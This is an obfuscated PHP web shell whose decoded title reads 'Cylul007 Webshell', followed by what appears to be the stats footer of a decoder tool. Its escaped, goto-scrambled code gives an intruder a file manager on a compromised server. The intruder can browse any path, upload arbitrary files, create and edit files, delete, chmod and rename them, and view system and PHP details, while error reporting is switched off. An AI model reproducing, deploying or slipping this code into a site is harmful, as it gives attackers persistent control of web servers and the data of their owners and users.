<center><h1><font color="red">Add File</h1><table><form action=""method="post"><h2>Isi File :<br></h2><textarea cols="115"name="penjelasan"rows="10"> </textarea> <font color="red">Nama File: </font><input name="name"style="width:300px"><input name="ok"type="submit"value="Simpan"></form></table></center><?php if (isset($_POST["\157\153"])) { if (empty($_POST["\156\141\155\x65"])) { print "\x46\x69\154\154\x20\124\x68\145\x20\116\141\x6d\x65\40\x42\x61\x73\164\141\x72\x64\x21\41\41"; } else { $filename = $_POST["\156\x61\x6d\x65"]; if (isset($_POST["\x70\x65\156\152\145\154\141\x73\141\x6e"])) { $data = $_POST["\x70\x65\x6e\152\x65\154\x61\x73\141\156"]; } $buka = fopen("{$filename}", "\141\x2b"); fwrite($buka, "{$data}"); fclose($buka); if ($buka) { echo "\74\x66\157\156\x74\40\x63\157\154\x6f\162\75\47\154\x69\155\145\x27\76\x46\x69\154\145\x20\103\x72\145\x61\x74\x65\144\x3c\x2f\141\76\x3c\57\x66\x6f\x6e\164\x3e"; } else { echo "\x3c\146\x6f\x6e\164\40\x63\x6f\x6c\157\x72\x3d\47\162\145\x64\47\76\103\141\156\x6e\157\164\x20\103\162\x65\x61\x74\x65\40\106\151\x6c\x65\74\x2f\141\x3e\x3c\x2f\x66\157\x6e\164\x3e"; } } } } echo "\x3c\x2f\x63\145\x6e\x74\x65\x72\x3e"; $scandir = $sc4nd1r($path); echo "\x3c\144\151\x76\x20\151\x64\x3d\42\143\x6f\x6e\x74\x65\156\x74\x22\76\x3c\x74\141\x62\x6c\x65\40\167\151\x64\164\x68\75\42\x31\60\x30\x25\42\40\142\x6f\162\144\x65\x72\x3d\42\x30\42\x20\x63\x65\x6c\x6c\x70\141\x64\x64\x69\156\147\75\42\63\x22\x20\x63\x65\154\x6c\x73\160\x61\x63\x69\x6e\147\x3d\42\61\x22\40\141\x6c\151\x67\x6e\75\x22\143\145\156\x74\x65\162\x22\76\xa\74\164\162\40\x63\154\x61\163\163\x3d\x22\x66\x69\162\x73\x74\x22\x3e\xa\x3c\x74\x64\76\x3c\143\x65\x6e\164\145\x72\76\x4e\x61\x6d\x65\74\x2f\160\x65\x6c\x6c\x65\162\76\x3c\x2f\143\x65\x6e\164\x65\162\x3e\74\x2f\x74\144\76\12\x3c\x74\144\x3e\x3c\x63\145\156\164\x65\162\x3e\124\x79\x70\x65\74\57\160\x65\154\x6c\x65\x72\x3e\x3c\x2f\143\x65\x6e\164\x65\x72\x3e\74\x2f\164\144\76\xa\x3c\164\144\x3e\74\143\145\x6e\164\145\162\76\123\151\x7a\x65\x3c\x2f\160\x65\154\x6c\145\162\x3e\x3c\57\143\145\156\164\x65\x72\x3e\74\57\164\144\x3e\12\x3c\164\144\x3e\74\x63\145\156\x74\145\x72\76\114\x61\x73\164\40\115\157\x64\x69\x66\x69\x65\144\x3c\x2f\160\x65\x6c\154\145\x72\x3e\x3c\x2f\143\x65\156\x74\x65\x72\76\74\57\x74\144\76\12\x3c\164\x64\76\x3c\x63\x65\x6e\x74\145\x72\x3e\x50\145\x72\x6d\x69\x73\x73\151\x6f\156\74\x2f\160\145\154\154\145\x72\x3e\74\57\143\145\x6e\164\x65\162\x3e\x3c\x2f\x74\144\x3e\12\74\x74\144\x3e\74\x63\x65\x6e\164\145\162\76\x41\x63\164\x69\x6f\156\x3c\x2f\160\x65\x6c\x6c\145\x72\76\74\57\143\x65\156\164\145\162\x3e\x3c\x2f\164\144\76\xa\x3c\57\x74\162\x3e"; foreach ($scandir as $dir) { if (!is_dir($path . "\57" . $dir) || $dir == "\56" || $dir == "\56\56") { continue; } $dtype = filetype("{$path}\x2f{$dir}"); $dtime = date("\x59\x2f\x6d\x2f\x64", filemtime("{$path}\57{$dir}")); echo "\74\164\x72\x3e\xa\74\x74\144\x3e\74\x69\x6d\x67\40\x73\x72\143\75\x22\150\164\164\160\163\72\x2f\x2f\x69\x2e\x69\x62\142\56\x63\x6f\57\120\x77\104\65\166\62\106\57\146\157\154\144\x65\x72\x2e\x70\x6e\x67\x22\40\x77\151\x64\164\x68\x3d\42\x31\x35\x22\x20\150\145\x69\147\x68\x74\75\42\x31\x35\x22\76\74\x61\x20\150\162\x65\x66\x3d\42\x3f\160\141\164\150\x3d" . $path . "\57" . $dir . "\42\76" . $dir . "\x3c\x2f\141\x3e\74\57\164\144\76\12\x3c\164\144\x3e\x3c\143\145\x6e\x74\x65\162\x3e" . $dtype . "\x3c\x2f\x63\x65\x6e\164\x65\x72\76\74\x2f\x74\x64\x3e\xa\74\x74\x64\76\x3c\x63\145\156\164\145\x72\76\x2d\55\x3c\x2f\143\145\156\164\x65\162\76\x3c\57\164\x64\x3e\12\74\164\x64\76\x3c\143\145\156\x74\145\162\76" . $dtime . "\x3c\57\143\x65\156\x74\x65\x72\76\74\57\164\144\76\12\74\164\x64\x3e\74\143\145\156\x74\145\x72\76"; if (is_writable($path . "\x2f" . $dir)) { echo "\74\146\157\156\164\x20\x63\x6f\x6c\157\162\x3d\42\x6c\x69\155\145\x22\x3e"; } elseif (!is_readable($path . "\57" . $dir)) { echo "\74\146\157\x6e\164\x20\x63\157\x6c\x6f\162\75\42\162\x65\x64\x22\76"; } echo perms($path . "\57" . $dir); if (is_writable($path . "\57" . $dir) || !is_readable($path . "\x2f" . $dir)) { echo "\x3c\57\146\x6f\156\x74\x3e"; } echo "\74\x2f\143\x65\156\x74\x65\162\x3e\74\57\164\x64\x3e\xa\74\164\144\76\74\143\145\156\x74\145\x72\76\x3c\x66\x6f\x72\155\x20\x6d\145\164\150\x6f\x64\75\x22\x50\117\x53\x54\42\40\x61\x63\164\151\x6f\156\75\x22\x3f\157\x70\164\151\157\156\46\160\x61\164\x68\75" . $path . "\42\x3e\xa\x3c\163\x65\x6c\x65\143\x74\x20\x6e\141\x6d\x65\x3d\x22\157\x70\x74\42\76\12\74\x6f\x70\x74\x69\x6f\156\x20\166\141\x6c\x75\x65\x3d\x22\42\76\123\145\154\145\x63\x74\74\x2f\157\160\164\x69\x6f\156\76\12\74\x6f\160\164\151\x6f\x6e\x20\166\141\x6c\x75\145\x3d\x22\x64\x65\154\145\x74\145\42\76\x44\x65\x6c\145\164\145\x3c\x2f\x6f\160\x74\x69\157\156\x3e\12\74\x6f\160\x74\151\x6f\156\x20\166\x61\x6c\165\145\x3d\x22\143\x68\x6d\x6f\x64\42\x3e\103\x68\x6d\157\144\x3c\x2f\157\160\x74\x69\157\x6e\x3e\12\74\x6f\160\x74\151\157\156\40\x76\141\x6c\x75\145\x3d\42\162\x65\x6e\x61\155\145\42\x3e\122\145\156\x61\x6d\145\x3c\x2f\157\x70\x74\x69\x6f\156\76\xa\x3c\x2f\x73\x65\x6c\x65\x63\x74\76\xa\x3c\151\x6e\x70\165\164\40\x74\x79\x70\x65\x3d\42\150\x69\x64\x64\x65\x6e\x22\40\x6e\x61\x6d\145\x3d\x22\x74\171\x70\x65\42\40\x76\141\154\x75\145\x3d\x22\x64\151\162\42\76\12\x3c\x69\156\x70\165\x74\x20\x74\171\x70\x65\75\42\150\151\144\144\x65\x6e\x22\40\156\141\155\x65\75\x22\x6e\x61\x6d\x65\x22\40\x76\141\x6c\x75\145\75\x22" . $dir . "\x22\x3e\xa\x3c\x69\156\160\165\164\x20\164\x79\x70\145\x3d\x22\x68\151\x64\144\x65\x6e\42\x20\x6e\141\x6d\145\75\42\x70\141\164\x68\x22\x20\x76\141\154\x75\x65\x3d\x22" . $path . "\57" . $dir . "\42\76\xa\74\151\156\160\x75\x74\40\x74\x79\160\x65\x3d\x22\163\165\x62\155\x69\164\x22\40\x76\x61\154\x75\x65\x3d\42\76\x3e\x3e\42\76\xa\74\x2f\x66\x6f\162\155\x3e\x3c\x2f\143\x65\156\164\x65\x72\76\74\57\x74\144\x3e\xa\x3c\57\164\x72\x3e"; } echo "\74\164\x72\x20\143\154\x61\x73\163\75\x22\146\151\162\163\x74\42\76\x3c\164\x64\76\x3c\x2f\x74\144\x3e\x3c\x74\144\76\74\x2f\x74\144\76\x3c\x74\144\x3e\74\57\164\x64\76\x3c\x74\144\x3e\x3c\x2f\164\144\76\74\x74\x64\x3e\74\57\x74\x64\x3e\x3c\x74\x64\76\74\x2f\164\x64\76\74\57\164\x72\76"; foreach ($scandir as $file) { if (!is_file($path . "\57" . $file)) { continue; } $ftype = filetype("{$path}\57{$file}"); $ftime = date("\x59\x2f\155\x2f\x64", filemtime("{$path}\57{$file}")); $size = filesize($path . "\57" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\x4d\102"; } else { $size = $size . "\40\x4b\102"; } echo "\74\164\x72\x3e\xa\74\164\144\76\74\151\x6d\147\40\x73\162\x63\75\x22\150\164\164\160\x73\72\x2f\x2f\151\56\151\x62\142\x2e\143\157\57\116\116\122\150\130\x70\x33\x2f\144\x65\x66\x2d\146\x69\x6c\145\56\160\x6e\x67\42\40\x77\151\x64\164\150\x3d\42\61\x35\x22\x20\x68\145\151\x67\x68\x74\75\42\x31\65\x22\76\74\141\40\x68\x72\145\x66\75\42\x3f\146\x69\154\145\x73\162\x63\x3d" . $path . "\57" . $file . "\46\x70\141\x74\x68\x3d" . $path . "\x22\x3e" . $file . "\74\57\141\x3e\x3c\x2f\164\144\x3e\xa\74\x74\144\76\74\x63\145\x6e\x74\x65\162\x3e" . $ftype . "\74\x2f\143\x65\156\x74\145\x72\x3e\74\x2f\164\x64\x3e\12\74\x74\144\76\x3c\x63\x65\156\x74\x65\162\76" . $size . "\x3c\x2f\143\145\156\164\x65\162\x3e\x3c\x2f\x74\x64\x3e\12\74\164\144\76\x3c\x63\145\x6e\164\x65\162\76" . $ftime . "\x3c\57\x63\145\156\164\145\x72\76\x3c\x2f\164\144\76\12\x3c\x74\144\76\x3c\x63\145\156\x74\145\x72\x3e"; if (is_writable($path . "\57" . $file)) { echo "\x3c\146\157\156\164\40\x63\157\154\157\x72\75\x22\x6c\x69\x6d\x65\42\76"; } elseif (!is_readable($path . "\x2f" . $file)) { echo "\x3c\x66\157\156\x74\x20\143\x6f\x6c\157\162\x3d\x22\x72\x65\x64\x22\76"; } echo perms($path . "\57" . $file); if (is_writable($path . "\57" . $file) || !is_readable($path . "\57" . $file)) { echo "\x3c\x2f\x66\157\156\x74\x3e"; } echo "\x3c\x2f\143\x65\x6e\x74\145\x72\x3e\x3c\x2f\164\x64\76\xa\x3c\x74\144\76\x3c\143\145\x6e\x74\145\162\76\x3c\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\75\x22\x50\117\x53\x54\42\x20\x61\143\164\x69\x6f\x6e\x3d\42\77\157\x70\164\151\157\x6e\x26\160\141\x74\150\75" . $path . "\42\76\xa\74\x73\x65\x6c\x65\x63\x74\40\x6e\141\155\x65\x3d\x22\157\x70\164\42\x3e\xa\74\x6f\160\x74\x69\x6f\x6e\x20\x76\141\x6c\x75\x65\75\x22\42\x3e\123\145\154\x65\x63\164\74\x2f\x6f\160\164\151\x6f\156\x3e\xa\74\157\160\164\151\x6f\156\x20\166\x61\x6c\x75\145\x3d\42\x64\x65\154\145\x74\145\42\76\104\x65\154\x65\164\x65\x3c\x2f\157\x70\x74\151\x6f\x6e\x3e\12\x3c\x6f\x70\x74\x69\x6f\156\x20\x76\x61\154\165\x65\75\42\x63\150\x6d\157\x64\42\76\x43\150\x6d\x6f\144\x3c\57\157\160\164\x69\x6f\156\x3e\12\x3c\x6f\160\164\x69\x6f\x6e\40\166\x61\154\165\x65\75\42\162\x65\x6e\141\x6d\x65\42\x3e\x52\145\x6e\141\x6d\145\x3c\x2f\x6f\x70\x74\x69\157\156\x3e\12\x3c\x6f\160\164\x69\157\156\40\x76\x61\154\x75\145\x3d\x22\x65\144\x69\164\x22\76\x45\144\151\x74\74\57\157\160\164\x69\157\156\76\12\74\x2f\163\145\154\x65\143\x74\x3e\12\74\151\x6e\160\165\164\40\x74\171\160\x65\x3d\42\150\151\144\x64\145\x6e\x22\x20\156\x61\155\145\75\x22\164\x79\x70\145\x22\x20\x76\x61\154\x75\145\75\42\x66\x69\154\x65\42\76\xa\x3c\151\x6e\160\x75\x74\x20\x74\171\160\x65\x3d\x22\150\151\x64\144\145\x6e\x22\x20\x6e\x61\x6d\x65\75\x22\156\x61\x6d\145\x22\40\x76\x61\x6c\165\x65\x3d\42" . $file . "\x22\76\12\x3c\151\156\x70\165\x74\x20\164\x79\160\145\x3d\42\x68\x69\x64\x64\x65\x6e\x22\x20\x6e\141\x6d\x65\x3d\x22\x70\141\164\x68\42\40\166\x61\x6c\x75\x65\75\x22" . $path . "\57" . $file . "\42\76\12\74\151\156\160\165\164\x20\164\171\160\x65\75\x22\x73\x75\x62\155\x69\164\42\x20\x76\141\154\165\145\x3d\42\x3e\x3e\76\x22\76\xa\x3c\x2f\146\x6f\x72\x6d\76\74\57\143\145\x6e\164\x65\162\76\74\57\164\x64\76\xa\x3c\x2f\164\162\76"; } echo "\74\164\162\x20\x63\x6c\x61\x73\x73\x3d\42\146\151\162\x73\x74\42\x3e\x3c\164\144\76\74\x2f\x74\144\76\74\164\x64\76\x3c\57\x74\x64\x3e\x3c\164\x64\76\x3c\57\x74\x64\x3e\74\164\144\x3e\x3c\57\164\x64\76\x3c\164\x64\76\74\57\164\x64\76\x3c\164\x64\x3e\74\57\164\x64\76\74\x2f\x74\x72\76\74\57\x74\x61\x62\x6c\x65\x3e\12\x3c\x2f\144\151\x76\76"; } goto TOyQX; sUXNU: if (isset($_GET["\x70\x61\x74\150"])) { $path = $_GET["\x70\141\x74\x68"]; } else { $path = $get_dir(); } goto sTTAr; rvBCr: echo "\x3c\146\157\162\155\x20\145\156\143\x74\171\x70\145\75\42\155\x75\x6c\x74\x69\160\141\x72\164\x2f\146\157\162\x6d\55\x64\141\x74\141\42\40\155\x65\x74\x68\157\x64\75\x22\x50\x4f\123\x54\x22\x3e\12\74\146\x6f\x6e\x74\40\143\x6f\154\157\162\75\x22\167\150\151\164\145\x22\76\106\x69\x6c\145\40\125\x70\154\157\141\144\x20\x3a\74\57\146\x6f\x6e\x74\76\40\x3c\x69\x6e\160\x75\164\40\164\171\x70\145\75\42\146\151\154\145\x22\x20\156\x61\x6d\x65\x3d\x22\146\151\154\x65\x22\40\57\76\74\151\156\x70\165\x74\40\164\x79\x70\145\x3d\42\163\x75\142\155\151\x74\x22\40\x76\x61\x6c\x75\145\x3d\x22\x75\160\154\157\141\x64\42\x20\x2f\x3e\74\x2f\146\157\162\x6d\76\74\x2f\x74\144\76\x3c\57\164\162\76"; goto WQnWr; xqpzo: $paths = explode("\57", $path); goto brTpt; ceZP4: $on = php_sapi_name(); goto STqMn; zZBvI: if (isset($_FILES["\x66\x69\x6c\x65"])) { if (copy($_FILES["\x66\x69\x6c\145"]["\164\x6d\160\137\x6e\141\155\x65"], $path . "\57" . $_FILES["\146\x69\x6c\145"]["\x6e\141\x6d\x65"])) { echo "\x3c\146\157\156\164\x20\x63\157\154\157\162\x3d\42\154\x69\x6d\x65\x22\x3e\x55\x70\154\157\x61\x64\40\x53\x75\143\143\x65\163\163\146\x75\154\x6c\x3c\57\x66\157\156\x74\x3e\x3c\142\162\40\57\76"; } else { echo "\74\x66\157\156\164\x20\143\x6f\154\x6f\x72\75\42\162\145\x64\x22\76\x55\160\x6c\x6f\x61\144\x20\x46\x61\x69\x6c\x65\x64\74\x2f\x66\157\x6e\x74\76\x3c\x62\162\57\76"; } } goto rvBCr; X02hQ: error_reporting(0); goto QpFh3; OCBj9: echo "\74\x6c\151\x20\143\154\141\163\163\x3d\42\144\x65\163\x74\162\x6f\x79\137\164\x61\142\x6c\x65\x22\76\x3c\141\x20\x68\162\145\x66\x3d\x22\x3f\160\141\x74\150\75" . $path . "\x26\157\160\164\x3d\x6e\x65\167\146\157\154\144\145\162\42\76\x4e\145\x77\40\x46\x6f\154\144\145\x72\x3c\x2f\x61\x3e\74\x2f\x6c\151\76\x3c\57\x63\x65\156\x74\x65\x72\76"; goto z_eAD; ZiMNP: echo "\74\41\104\x4f\x43\124\x59\120\x45\x20\110\x54\115\x4c\x3e\74\150\x74\x6d\x6c\x3e\74\150\x65\141\x64\x3e\74\x6c\151\x6e\153\x20\150\162\145\146\75\x22\42\x72\x65\154\x3d\x22\163\164\171\x6c\145\x73\x68\x65\x65\164\42\76\74\x74\x69\164\x6c\145\76\x43\171\154\165\x6c\60\60\67\x20\x57\145\142\x73\150\x65\154\154\74\x2f\x74\151\164\x6c\145\x3e\74\163\164\x79\x6c\x65\x3e\xa\142\157\144\x79\173\x66\157\x6e\x74\x2d\x73\x69\x7a\145\x3a\61\x38\160\170\x3b\x66\x6f\156\x74\x2d\146\x61\155\x69\x6c\x79\x3a\x22\x52\141\143\151\156\x67\x20\x53\x61\x6e\x73\x20\x4f\156\x65\42\x2c\163\141\156\163\x2d\x73\x65\162\x69\x66\x3b\142\x61\143\x6b\x67\x72\157\x75\156\x64\55\x63\157\x6c\157\x72\x3a\x23\60\60\60\x3b\x63\157\x6c\157\162\72\43\146\x66\146\175\43\x63\157\156\x74\145\x6e\x74\40\x74\162\x3a\x68\x6f\x76\x65\x72\x7b\x62\141\x63\x6b\147\x72\157\165\156\144\55\143\157\x6c\157\162\72\162\145\x64\73\164\145\170\164\55\163\x68\141\x64\157\x77\x3a\x30\40\60\40\61\60\x70\170\40\x23\x66\x66\x66\x7d\43\x63\x6f\156\x74\145\156\164\40\x2e\x66\x69\162\163\x74\173\x62\141\143\x6b\x67\162\x6f\165\x6e\144\x2d\143\x6f\154\157\162\x3a\x72\145\144\175\164\x61\x62\x6c\x65\x7b\142\x6f\x72\x64\x65\x72\x3a\x31\x70\x78\40\43\60\x30\x30\40\144\157\164\x74\145\144\x7d\x61\173\x63\x6f\x6c\157\162\x3a\43\146\x66\146\x3b\164\145\170\x74\x2d\144\145\143\x6f\162\x61\164\x69\x6f\156\x3a\x6e\157\156\x65\175\141\72\150\157\166\145\162\173\143\157\x6c\157\x72\72\43\60\x30\146\73\x74\145\x78\164\x2d\x73\x68\141\x64\x6f\x77\x3a\60\40\x30\40\x31\x30\x70\170\x20\43\x66\146\146\175\151\156\x70\x75\x74\x5b\x74\171\160\x65\x3d\164\145\170\164\x5d\x2c\151\x6e\x70\165\x74\x5b\x74\171\x70\x65\x3d\146\151\x6c\145\135\x2c\151\x6e\x70\x75\x74\x5b\x74\171\x70\145\75\145\155\x61\x69\154\x5d\x2c\151\156\x70\165\164\x5b\164\x79\x70\x65\x3d\x70\141\163\163\x77\x6f\162\x64\135\x2c\163\x65\154\x65\143\x74\173\142\141\x63\x6b\147\x72\x6f\x75\x6e\144\72\43\x31\61\61\73\x63\x6f\x6c\x6f\x72\72\x72\x65\x64\73\x62\x6f\162\x64\145\162\x3a\x30\73\x70\x61\x64\144\151\x6e\147\72\x32\x70\170\73\142\x6f\162\144\x65\x72\55\142\x6f\x74\164\157\x6d\x3a\x31\160\170\40\163\x6f\x6c\x69\x64\40\43\62\62\62\x3b\142\157\x72\x64\145\162\x2d\x74\157\160\x3a\x31\160\170\x20\163\157\154\x69\144\x20\43\x32\x32\x32\73\x2d\155\x6f\172\x2d\142\x6f\x72\x64\x65\162\55\x72\141\144\151\x75\163\72\65\x70\x78\73\55\x6d\157\172\x2d\142\157\x78\55\163\x68\141\144\x6f\167\x3a\60\x70\x78\x20\60\x70\x78\40\x31\x30\160\x78\x20\143\157\x6c\157\162\72\40\162\145\144\x3b\55\x77\145\x62\x6b\x69\164\55\142\157\170\x2d\x73\x68\x61\x64\157\167\x3a\x30\x20\60\40\65\x70\x78\175\x69\156\160\165\x74\133\x74\x79\x70\145\x3d\163\165\x62\155\x69\164\135\x2c\151\156\160\165\x74\133\164\x79\160\x65\75\162\145\x73\x65\x74\135\x7b\x62\141\143\153\x67\162\x6f\165\156\x64\55\x63\x6f\154\157\162\72\x23\x30\x30\x30\x3b\x63\x6f\154\157\162\x3a\162\x65\144\x3b\142\157\162\144\x65\162\72\61\x20\x73\x6f\x6c\x69\x64\x20\162\145\144\73\x62\x6f\162\144\x65\162\x2d\162\x61\x64\x69\165\163\72\x35\x70\170\x3b\x62\157\x78\x2d\163\150\x61\x64\157\x77\72\x30\40\x32\160\170\x20\x38\x70\170\40\x30\40\x72\x65\144\73\x74\x65\170\x74\x2d\141\154\151\147\x6e\72\143\145\156\x74\145\162\73\x6d\x61\162\147\x69\x6e\x3a\x35\x70\x78\40\62\x70\x78\73\x70\141\144\x64\x69\x6e\147\x3a\x32\160\x78\x3b\143\x75\162\163\157\162\x3a\160\x6f\x69\x6e\x74\145\x72\x7d\x69\x6e\160\x75\164\133\x74\171\x70\145\x3d\164\145\x78\164\x5d\54\x69\156\x70\x75\164\x5b\164\171\160\145\75\x66\151\x6c\145\x5d\x2c\151\x6e\160\x75\164\x5b\164\171\160\145\x3d\145\x6d\x61\x69\x6c\135\54\x69\156\x70\x75\164\x5b\x74\171\x70\145\75\x70\141\163\x73\x77\x6f\162\x64\135\54\163\145\x6c\145\x63\164\x3a\x68\157\x76\145\162\173\142\x6f\x72\144\145\162\72\61\x70\170\x20\x73\157\x6c\x69\x64\40\162\145\144\x3b\142\x61\143\153\147\162\157\165\x6e\144\x2d\143\157\x6c\x6f\162\x3a\43\x30\60\60\73\143\x6f\x6c\157\x72\72\162\145\144\x7d\151\x6e\x70\165\x74\133\x74\x79\x70\x65\x3d\x73\x75\x62\x6d\x69\164\135\54\x69\x6e\160\x75\x74\x5b\x74\171\160\145\x3d\162\145\x73\x65\x74\x5d\x3a\x68\x6f\166\145\162\173\x62\x6f\x72\x64\x65\x72\55\x62\157\164\x74\157\155\72\61\x70\x78\x20\163\x6f\x6c\151\x64\x20\162\x65\144\x3b\x62\157\162\144\x65\x72\55\164\157\x70\72\x31\x70\x78\x20\x73\157\154\x69\144\x20\x72\145\144\73\x2d\x6d\157\x7a\x2d\x62\157\x72\x64\145\x72\55\162\141\x64\151\x75\x73\72\65\160\x78\x3b\x2d\155\x6f\172\x2d\142\x6f\170\55\x73\150\x61\x64\x6f\167\x3a\x30\x70\170\40\60\x70\170\40\x31\x30\x70\x78\x20\x63\x6f\154\157\x72\72\40\162\145\144\x3b\x2d\x77\145\x62\153\x69\164\x2d\x62\x6f\170\x2d\x73\150\141\x64\x6f\x77\72\60\40\x30\40\65\x70\x78\x7d\x74\x65\170\x74\141\x72\x65\x61\x7b\x62\x61\x63\153\x67\x72\157\x75\156\144\55\143\157\x6c\x6f\162\72\162\145\x64\x3b\143\157\154\x6f\x72\x3a\43\146\146\x66\x7d\x74\144\173\142\x6f\162\144\145\x72\72\x31\x70\170\40\x73\x6f\154\x69\144\x20\162\145\x64\73\142\157\x72\x64\x65\162\55\143\157\154\154\x61\x70\x73\x65\x3a\143\x6f\154\x6c\141\160\x73\x65\x3b\x70\141\144\x64\151\x6e\x67\x3a\x35\x70\x78\175\x2e\x64\145\163\164\162\x6f\x79\137\164\141\142\154\145\x7b\142\x61\143\x6b\147\x72\157\x75\x6e\x64\x3a\x30\40\60\73\x62\x6f\162\144\x65\162\72\61\x70\x78\x20\163\157\154\151\144\40\162\x65\144\73\146\x6f\x6e\x74\55\x66\x61\x6d\151\x6c\171\x3a\113\145\x6c\x6c\171\x20\123\x6c\x61\x62\73\x64\x69\163\160\x6c\141\171\72\x69\x6e\x6c\x69\156\145\55\142\x6c\x6f\143\153\x3b\x63\x75\x72\163\157\162\72\x70\x6f\x69\x6e\164\145\162\73\x63\x6f\154\157\x72\72\x23\x66\x66\146\x3b\146\x6f\x6e\x74\x2d\x73\x69\172\145\72\61\67\x78\x3b\146\157\156\164\55\167\145\x69\x67\150\x74\x3a\x37\x30\x30\x3b\160\141\144\144\151\x6e\x67\72\63\160\170\40\62\60\160\x78\x3b\x74\x65\170\x74\55\144\145\143\157\x72\x61\x74\151\x6f\156\72\x23\x66\146\x66\73\x74\145\170\164\x2d\x73\150\141\144\157\x77\72\x30\40\x30\40\60\40\x23\146\146\x30\65\x30\x35\175\154\151\x7b\144\151\x73\x70\x6c\141\171\72\x69\156\x6c\x69\156\145\x3b\x6d\141\162\147\151\156\x3a\x31\x70\170\x3b\160\141\x64\x64\151\x6e\147\72\61\160\170\175\43\155\145\x6e\165\x20\141\x7b\x70\141\x64\x64\151\x6e\x67\x3a\x31\160\x78\73\155\x61\162\x67\151\156\x3a\x31\x70\x78\x3b\142\141\143\x6b\x67\x72\157\x75\x6e\x64\72\43\60\x30\x30\x3b\x74\145\170\x74\x2d\x64\x65\143\157\x72\141\164\151\157\x6e\72\156\x6f\156\x65\73\x6c\145\x74\x74\145\x72\x2d\163\160\141\x63\x69\156\x67\x3a\x32\160\x78\x3b\x6c\145\x74\x74\x65\x72\x2d\x73\160\x61\x63\x69\x6e\147\72\62\x70\170\x3b\142\x6f\162\x64\145\162\x2d\x72\141\144\151\x75\x73\x3a\61\160\170\x3b\x62\157\162\x64\145\x72\x2d\x62\x6f\x74\x74\157\x6d\72\61\160\x78\x20\x73\x6f\154\x69\144\x20\162\x65\144\x3b\142\157\162\144\x65\162\x2d\164\x6f\x70\x3a\x31\160\x78\40\163\x6f\x6c\151\x64\40\162\x65\x64\73\142\157\162\x64\x65\162\x2d\162\151\147\150\164\x3a\x31\x70\x78\40\x73\157\154\x69\x64\40\x72\x65\x64\x3b\142\157\x72\144\145\x72\x2d\154\145\146\x74\x3a\61\x70\170\40\x73\x6f\x6c\151\144\40\x72\145\144\x7d\43\155\x65\156\165\40\x61\72\150\157\166\145\162\x7b\142\141\x63\153\147\162\157\x75\x6e\x64\72\x23\x30\60\60\73\142\x6f\x72\x64\x65\162\x2d\x62\x6f\x74\x74\x6f\x6d\x3a\x30\x20\x73\157\154\151\144\x20\43\x30\x30\60\73\142\157\x72\x64\x65\x72\55\164\157\x70\x3a\x30\40\x73\157\x6c\151\144\40\43\60\60\60\x7d\x68\162\173\143\157\x6c\x6f\162\x3a\162\x65\x64\x7d\12\74\x2f\163\164\x79\x6c\145\76\74\142\x6f\144\x79\x3e\x3c\x68\61\x3e\74\x63\145\x6e\164\145\x72\x3e\x3c\x66\x6f\x6e\x74\40\x63\157\x6c\157\162\75\x22\162\145\x64\42\x3e\103\x79\x6c\165\x6c\60\60\x37\x20\x57\x65\142\x73\x68\145\x6c\154\74\x2f\146\x6f\156\x74\76\x3c\57\143\145\x6e\x74\x65\x72\76\x3c\x2f\150\x31\x3e\xa\74\x74\162\x3e\74\x74\x64\76\x3c\x63\x65\156\x74\145\162\x3e\x3c\x66\x6f\x6e\x74\x20\x63\x6f\154\157\x72\75\x22\162\145\x64\42\x3e\x55\x6e\141\x6d\145\x20\74\x2f\146\157\156\x74\x3e\74\164\x64\76\72\x20\x3c\x66\157\x6e\164\x20\143\x6f\154\157\x72\x3d\42\154\151\x6d\x65\42\76" . $system . "\x3c\57\x66\157\x6e\164\76\x3c\x2f\x74\x72\x3e\74\x2f\x74\x64\76\x3c\x62\162\x3e\74\164\162\x3e\x3c\164\x64\x3e\74\x66\x6f\156\x74\x20\143\157\154\157\162\75\42\162\145\144\x22\76\x50\110\120\40\74\57\x66\157\x6e\164\76\x3c\164\144\76\x3a\x20\x3c\146\x6f\x6e\x74\x20\x63\157\x6c\x6f\162\x3d\x22\154\151\x6d\x65\42\x3e" . PHP_VERSION . "\40\x3c\x2f\146\157\156\x74\x3e\74\x66\157\x6e\164\x20\x63\x6f\154\x6f\x72\75\42\x77\150\151\x74\x65\x22\76\x6f\x6e\x20\74\57\x66\x6f\156\x74\76\74\146\x6f\156\164\40\143\157\154\157\x72\75\42\154\x69\155\x65\x22\76" . $on . "\74\x2f\x66\157\156\x74\76\74\x2f\164\x72\x3e\x3c\x2f\164\144\x3e\x3c\x62\162\76\74\164\x72\76\x3c\164\x64\x3e\x3c\x66\157\156\164\40\x63\x6f\x6c\157\162\x3d\x22\162\145\144\x22\x3e\124\151\155\x65\40\74\x2f\146\x6f\x6e\x74\76\74\164\x64\x3e\72\40\74\x66\x6f\156\x74\40\143\157\154\x6f\x72\x3d\x22\x6c\151\x6d\x65\x22\x3e" . date("\x64\40\115\x20\x59\x20\110\72\x69\x3a\163", time()) . "\40\x3c\57\146\x6f\x6e\164\x3e\x3c\x2f\x74\162\76\x3c\x2f\164\x64\x3e\x3c\57\x63\x65\156\x74\145\162\76\x3c\x62\x72\x3e\12\74\164\141\x62\154\x65\40\x77\x69\x64\x74\150\75\42\x35\x30\x30\42\x20\x62\157\162\x64\145\162\x3d\42\60\42\40\x63\145\x6c\x6c\160\141\144\144\x69\x6e\x67\x3d\42\63\x22\40\x63\145\154\x6c\163\x70\141\x63\151\156\x67\75\x22\61\42\40\x61\154\151\x67\x6e\x3d\x22\143\145\x6e\x74\x65\x72\x22\76\xa\74\x74\x72\76\x3c\x74\144\x3e\x3c\146\x6f\156\x74\40\143\157\154\157\162\x3d\x22\x77\x68\151\164\145\42\x3e\120\141\164\x68\x20\72\x3c\x2f\x66\x6f\156\164\x3e\40"; goto sUXNU; sTTAr: $path = str_replace("\x5c", "\57", $path); goto xqpzo; WQnWr: echo "\74\x63\x65\x6e\x74\145\x72\76\x3c\x6c\151\40\143\x6c\x61\x73\163\x3d\x22\x64\x65\163\164\x72\157\171\137\x74\141\142\154\x65\x22\76\x3c\x61\40\x68\x72\145\x66\x3d\x22\77\160\141\x74\150\x3d" . $path . "\46\144\x6f\75\156\x65\167\146\x69\154\145\x22\76\x4e\x65\167\40\106\x69\154\145\x3c\x2f\x61\x3e\74\57\x6c\x69\76"; goto OCBj9; iDTMt: $rm_dir = "\162\155\x64\151\x72"; goto WnU3I; HC3Bq:Function Calls
| None |
Stats
| MD5 | ffb59623eb3df4468598c477ec8785cf |
| Eval Count | 0 |
| Decode Time | 63 ms |